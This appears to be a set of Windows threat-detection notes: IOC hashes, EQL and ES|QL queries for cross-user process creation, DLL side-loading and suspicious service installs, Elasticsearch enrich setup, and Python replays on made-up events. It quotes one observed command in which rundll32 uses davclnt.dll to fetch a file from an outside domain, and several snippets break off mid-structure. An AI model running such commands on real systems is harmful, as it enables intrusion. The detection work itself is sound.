98faaafd3b450d836415eff09da56591fe31c54b4a668498416537262f2cd4c6
d5760da745c915753a1364a3d9762e75b503192327473bb3bda85282a532f4bc
ae67088e35d84034a56217bffe9aa3f830ea745b521432a6406106f446cfcee2
c382b67f4330082877b179fa1d7178cb8261f7519b2bf46965e6cabcd4c943b4
c7fb77d22e1d937220cc3a7527dd9eb6f5b663da81c830c67f1ba892a868ca27
68864134a67842ac2f863dfd92ec6ad6567571a436663b0bceda9e2ef0222de2
e8cbafcf196bb80ccb2249e8f6a18c02d8d67926a298165592c4ec742851749f
f67dd838b2a5fbb4739bd30ca721240f99f2f66e49c352aa600f2d443004c787
159dc9de2d297a560eda6f1a1b861d4fe52a285aa475137fc32688ccde8de7e5
f900d5bebd2241a0f1bf969c7c2ece6b6f53440d97ee3ddcd19566866a2dca18
"process": {
  "args": [
    "rundll32.exe",
    "C:\\WINDOWS\\system32\\davclnt.dll,DavSetCookie",
    "brukjanesis.com@80",
    "http://brukjanesis.com/TrdGallery/ResultTrd.bmp.url"
  ],
get-date
// requires event ID 4688 (process creation auditing) to be enabled
// EQL query: a new process whose token belongs to a different domain/local account than the creator's
process where event.action == "created-process" and
not startswith~(winlog.event_data.TargetUserSid, winlog.event_data.SubjectUserSid) and
winlog.event_data.TargetUserSid : "S-1-5-21-*" and not winlog.event_data.TargetUserSid: "S-1-0-0" and
not process.parent.executable : ("?:\\Program Files\\*", "?:\\Program Files (x86)\\*", "?:\\Windows\\System32\\svchost.exe", "?:\\Windows\\System32\\runtimebroker.exe")
// ES|QL query - frequency based - 1 host with a unique parent and child proc running as different user identities
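The EQL filter above, re-implemented in Python over constructed 4688-style events as an added example (this is not the gist author's code). Field names follow the winlog schema the query uses; the frequency-based ES|QL variant is cut off in the gist, so the per-host rarity helper below is this example's own approximation of it, not the gist's query.

```python
import fnmatch
from collections import defaultdict

# Parent executables the EQL query excludes; `?:` stands for any drive letter.
BENIGN_PARENT_GLOBS = (
    "?:\\Program Files\\*",
    "?:\\Program Files (x86)\\*",
    "?:\\Windows\\System32\\svchost.exe",
    "?:\\Windows\\System32\\runtimebroker.exe",
)


def _match_ci(value, pattern):
    """EQL `:` is a case-insensitive wildcard match; fnmatch shares the ? and * syntax."""
    return fnmatch.fnmatchcase(value.lower(), pattern.lower())


def is_cross_user_process_creation(event):
    """Python equivalent of the EQL filter: a 4688 event whose new process runs
    under a different domain/local account (S-1-5-21-*) than the account that
    called CreateProcess, ignoring the allowlisted parents."""
    if event.get("event.action") != "created-process":
        return False
    data = event.get("winlog.event_data", {})
    subject = data.get("SubjectUserSid", "")
    target = data.get("TargetUserSid", "")
    # startswith~ is case-insensitive; a target equal to (or prefixed by) the
    # subject means the process kept the caller's identity
    if target.lower().startswith(subject.lower()):
        return False
    # 4688 reports S-1-0-0 (NULL SID) as the target when no other token was used
    if not _match_ci(target, "S-1-5-21-*") or _match_ci(target, "S-1-0-0"):
        return False
    parent = event.get("process.parent.executable", "")
    return not any(_match_ci(parent, g) for g in BENIGN_PARENT_GLOBS)


def find_cross_user_creations(events):
    return [e["process.executable"] for e in events if is_cross_user_process_creation(e)]


def rare_parent_child_pairs(events, max_hosts=1):
    """Approximation (this example's own) of the frequency-based variant: matching
    parent/child pairs seen on at most `max_hosts` distinct hosts."""
    hosts = defaultdict(set)
    for e in events:
        if is_cross_user_process_creation(e):
            hosts[(e["process.parent.executable"], e["process.executable"])].add(e["host.name"])
    return sorted(pair for pair, seen in hosts.items() if len(seen) <= max_hosts)


def _ev(host, parent, child, subject, target):
    return {"event.action": "created-process", "host.name": host,
            "process.executable": child, "process.parent.executable": parent,
            "winlog.event_data": {"SubjectUserSid": subject, "TargetUserSid": target}}


USER = "S-1-5-21-1111-2222-3333-1001"
ADMIN = "S-1-5-21-1111-2222-3333-500"

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    # dropped binary spawns cmd.exe under the local Administrator token
    _ev("ws01", "C:\\Users\\bob\\Downloads\\stage.exe", "C:\\Windows\\System32\\cmd.exe", USER, ADMIN),
    # ordinary launch: no token change, 4688 fills the target with the NULL SID
    _ev("ws01", "C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\notepad.exe", USER, "S-1-0-0"),
    # cross-user but parented by svchost.exe (scheduled task): allowlisted
    _ev("ws02", "C:\\Windows\\System32\\svchost.exe", "C:\\Windows\\System32\\taskhostw.exe", "S-1-5-18", USER),
    # allowlisted path whose case differs from the glob: still excluded
    _ev("ws02", "c:\\program files\\Vendor\\agent.exe", "C:\\Windows\\System32\\whoami.exe", "S-1-5-18", USER),
]

if __name__ == "__main__":
    print(find_cross_user_creations(SAMPLE_EVENTS))
    print(rare_parent_child_pairs(SAMPLE_EVENTS))
```

Only the first sample fires: the other three are dropped by the NULL-SID check, the svchost.exe parent and the case-insensitive Program Files glob respectively, which is the same order of exclusions the EQL applies.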
// DLLs normally located in system32 but unsigned and loaded from elsewhere
// https://www.elastic.co/guide/en/elasticsearch/reference/master/esql-enrich-data.html
// example ENRICH libs-policy creation steps
https://gist.github.com/Samirbous/9f9c3237a0ada745e71cc2ba3425311c
ES|QL query:
from .ds-logs-endpoint.events.library-*
| where event.action == "load" and process.code_signature.status == "trusted" and dll.code_signature.status != "trusted" and
// create source index and define types
PUT /libs
{
  "mappings": {
    "properties": {
      "dll": {
        "properties": {
          "name": {
            "type": "text",
            "fields": {
PUT /native_dll1_index
{
  "mappings": {
    "properties": {
      "dll": {
        "properties": {
          "name": {
            "type": "text",
            "fields": {
              "keyword": {
PUT /libs/_doc/1?refresh=wait_for
{
  "dll.name": [
    "aadauthhelper.dll",
    "aadcloudap.dll",
    "aadjcsp.dll",
    "aadtb.dll",
    "aadwamextension.dll",
    "aarsvc.dll",
    "abovelockapphost.dll",
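Added example (not from the gist): the ENRICH lookup and the library-load ES|QL filter above replayed in Python over constructed events. The lookup set holds only the DLL names visible in the gist's libs document, and the "loaded from elsewhere" path condition is an assumption of this example, since the gist's query is cut off after `and`.

```python
# Lookup set standing in for the `libs` enrich index: DLL names that ship in
# System32. Only the names listed in the gist are included; a real policy
# would hold the full directory listing of a clean build.
NATIVE_SYSTEM32_DLLS = {
    "aadauthhelper.dll", "aadcloudap.dll", "aadjcsp.dll", "aadtb.dll",
    "aadwamextension.dll", "aarsvc.dll", "abovelockapphost.dll",
}

# Directories where a native DLL is expected to live (assumption of this
# example; the path condition in the gist's query is cut off).
SYSTEM_DIRS = ("\\windows\\system32\\", "\\windows\\syswow64\\")


def enrich(event, policy=NATIVE_SYSTEM32_DLLS):
    """Mimic ES|QL ENRICH: match dll.name against the lookup index and attach
    the result as a new field instead of repeating the list in every query."""
    out = dict(event)
    out["native_dll"] = event.get("dll.name", "").lower() in policy
    return out


def is_unsigned_native_dll_outside_system32(event):
    """Trusted-signed process loads a DLL that is not trusted-signed, carries a
    System32 name, but is loaded from somewhere else (search-order hijack /
    side-load pattern). A missing signature status counts as not trusted here."""
    if event.get("event.action") != "load":
        return False
    if event.get("process.code_signature.status") != "trusted":
        return False
    if event.get("dll.code_signature.status") == "trusted":
        return False
    e = enrich(event)
    if not e["native_dll"]:
        return False
    path = e.get("dll.path", "").lower()
    return not any(d in path for d in SYSTEM_DIRS)


def find_sideloads(events):
    return [(e["process.executable"], e["dll.path"]) for e in events
            if is_unsigned_native_dll_outside_system32(e)]


def _load(proc, proc_sig, dll_path, dll_sig):
    # dll_sig=None models a file with no signature status at all
    return {"event.action": "load", "process.executable": proc,
            "process.code_signature.status": proc_sig, "dll.path": dll_path,
            "dll.name": dll_path.rsplit("\\", 1)[-1], "dll.code_signature.status": dll_sig}


# Constructed sample library-load events, not real telemetry.
SAMPLE_LOADS = [
    # signed browser binary copied to Temp next to an unsigned aadauthhelper.dll
    _load("C:\\Users\\bob\\AppData\\Local\\Temp\\upd\\msedge.exe", "trusted",
          "C:\\Users\\bob\\AppData\\Local\\Temp\\upd\\aadauthhelper.dll", None),
    # the genuine, signed DLL from System32: benign
    _load("C:\\Windows\\System32\\svchost.exe", "trusted",
          "C:\\Windows\\System32\\aadcloudap.dll", "trusted"),
    # unsigned DLL that is not a System32 name: outside this rule's scope
    _load("C:\\Program Files\\Vendor\\app.exe", "trusted",
          "C:\\Program Files\\Vendor\\plugin.dll", None),
    # unsigned process loading an unsigned native-named DLL: the query only
    # looks at trusted processes, so not a match here
    _load("C:\\Users\\bob\\tool.exe", None, "C:\\Users\\bob\\aadtb.dll", None),
]

if __name__ == "__main__":
    for hit in find_sideloads(SAMPLE_LOADS):
        print("suspicious load:", hit)
```

One caveat when porting this back to ES|QL: the Python version treats an absent `dll.code_signature.status` as "not trusted", but in ES|QL a comparison against a null field evaluates to null and the row is filtered out by `where`. If your telemetry leaves the field empty on unsigned files, add an explicit `is null` branch to the query.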
sequence by winlog.computer_name with maxspan=5m
  [authentication where event.action == "logged-in" and
   // non-elevated token (4624 ElevatedToken resource string: %%1843 = No, %%1842 = Yes)
   winlog.event_data.ElevatedToken : "%%1843"] by winlog.event_data.TargetLogonId
  [iam where event.action == "service-installed"] by winlog.event_data.SubjectLogonId
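The sequence above replayed in Python over constructed 4624/service-install events, added here as an example rather than taken from the gist. Field names follow the query; hostnames, timestamps, logon IDs and service names are made up.

```python
from datetime import datetime, timedelta

# 4624 "Elevated Token" is logged as a resource-string id: %%1842 = Yes, %%1843 = No
ELEVATED_TOKEN_NO = "%%1843"
MAXSPAN = timedelta(minutes=5)


def _ts(s):
    return datetime.fromisoformat(s)


def find_service_installs_from_non_elevated_logons(events):
    """Replay the EQL sequence: per host, a logon with a non-elevated token
    followed within 5 minutes by a service install whose SubjectLogonId equals
    the logon's TargetLogonId. Returns (host, service name, logon id) tuples."""
    pending = {}   # (host, logon id) -> timestamp of the qualifying logon
    hits = []
    for e in sorted(events, key=lambda e: _ts(e["@timestamp"])):
        host = e["winlog.computer_name"]
        data = e["winlog.event_data"]
        when = _ts(e["@timestamp"])
        if e["event.category"] == "authentication" and e["event.action"] == "logged-in":
            if data.get("ElevatedToken") == ELEVATED_TOKEN_NO:
                pending[(host, data["TargetLogonId"])] = when
        elif e["event.category"] == "iam" and e["event.action"] == "service-installed":
            key = (host, data.get("SubjectLogonId"))
            started = pending.pop(key, None)   # a matched first event is consumed
            if started is not None and when - started <= MAXSPAN:
                hits.append((host, data.get("ServiceName"), key[1]))
    return hits


def _logon(host, ts, logon_id, elevated):
    return {"@timestamp": ts, "winlog.computer_name": host,
            "event.category": "authentication", "event.action": "logged-in",
            "winlog.event_data": {"TargetLogonId": logon_id, "ElevatedToken": elevated}}


def _svc(host, ts, logon_id, name):
    return {"@timestamp": ts, "winlog.computer_name": host,
            "event.category": "iam", "event.action": "service-installed",
            "winlog.event_data": {"SubjectLogonId": logon_id, "ServiceName": name}}


# Constructed sample events, not real telemetry.
SAMPLE_LOGON_EVENTS = [
    # non-elevated session installs a service two minutes later: hit
    _logon("ws01", "2024-05-01T10:00:00", "0x3e7a1", "%%1843"),
    _svc("ws01", "2024-05-01T10:02:00", "0x3e7a1", "UpdaterSvc"),
    # UAC-approved admin session installing a service: expected, no hit
    _logon("ws01", "2024-05-01T10:05:00", "0x3e7b2", "%%1842"),
    _svc("ws01", "2024-05-01T10:06:00", "0x3e7b2", "VendorAgent"),
    # same logon id on another host, but ten minutes later: outside maxspan
    _logon("ws02", "2024-05-01T11:00:00", "0x3e7a1", "%%1843"),
    _svc("ws02", "2024-05-01T11:10:00", "0x3e7a1", "LateSvc"),
]

if __name__ == "__main__":
    print(find_service_installs_from_non_elevated_logons(SAMPLE_LOGON_EVENTS))
```

Service installation normally needs administrative rights, so the installing session is expected to carry an elevated token; a match therefore points at a session that gained that capability some other way and is worth a look. The join key is deliberately the logon ID rather than the user name, so two sessions of the same account on one host are not confused, and the host is part of the key because logon IDs are only unique per machine.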